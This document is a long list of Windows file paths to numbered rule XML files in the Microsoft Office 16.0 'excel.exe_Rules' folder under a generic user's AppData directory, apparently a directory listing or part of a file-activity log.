C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11499v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11498v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11464v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11381v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11370v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11369v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11362v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11302v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11300v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11289v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11285v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11264v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11210v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11209v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11208v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11195v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11190v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11187v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11154v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11150v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10955v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10952v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10940v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10907v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10906v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10902v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10829v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10822v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10821v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10819v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10627v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10626v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10450v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63066v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63063v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63057v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63054v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63051v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63048v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100094v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70037v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70036v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70031v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70030v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70029v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70028v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320005v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90118v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390004v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390005v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10784v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10803v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10808v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10924v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10925v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10625v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10781v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10800v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10801v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10802v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10879v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10880v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10881v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10882v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10807v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324013v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324014v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324015v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324012v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324011v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120201v14.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120205v11.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23070v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23120v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23122v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23123v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23124v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23125v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70500v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320007v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510005v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510006v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510046v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510047v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510062v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510063v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510008v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510009v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510010v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510012v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510017v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510018v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510015v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510016v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100119v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100113v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100114v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100115v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100116v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100117v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100118v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100109v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100110v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule220004v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule220035v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule220036v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100042v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100043v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100068v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100069v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100070v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100071v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100074v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100083v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100084v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100085v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100201v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100202v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100075v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100076v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100077v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100078v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100079v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100124v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100125v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100126v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100127v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100128v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100129v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100130v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100131v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100132v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100133v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100134v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100104v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100105v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100106v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460009v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460008v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule130009v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370012v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120305v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120300v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241001v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241002v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70503v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70504v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule840001v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490023v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490029v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490027v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325001v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325002v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500000v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500001v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500002v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500003v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500004v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500005v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500006v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500007v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500008v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500009v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500022v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500023v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500024v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490002v13.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490003v7.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490004v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490005v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490010v7.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490030v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490031v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226003v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370001v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370002v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370005v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370006v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370007v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370009v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370011v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360000v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360001v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320006v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320001v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320002v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320003v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320004v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320009v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320016v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320021v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320022v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320029v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320032v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320033v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320034v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320035v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322001v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322006v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226009v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240005v8.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240006v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240007v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240008v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240009v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240010v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240012v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240013v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240014v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240015v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240016v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240018v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240020v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240021v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240025v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240026v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240029v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240030v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240031v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240032v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240033v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240034v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240038v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240039v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule310000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule230161v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170000v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170002v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170003v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170005v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170007v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170009v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170011v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170012v8.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170013v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170014v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170016v7.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170019v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170022v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170024v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170026v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170027v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170030v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170032v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170033v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170034v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170035v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170037v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170038v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170039v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170040v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170041v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170042v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170043v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170044v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170048v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170050v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170052v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170053v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170054v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170056v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170058v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170059v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170060v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170061v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170065v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170068v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170069v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170070v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170071v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170072v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170073v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170074v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170075v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170076v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170077v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170078v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170080v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170081v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170082v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170083v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170086v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170087v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170088v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170089v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170091v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170095v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170096v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170097v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170098v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170099v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170103v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170104v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170105v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170106v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170107v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170110v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170111v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170112v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170113v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170114v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170115v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170116v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170117v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170118v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170127v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170129v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170130v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170133v0.xml
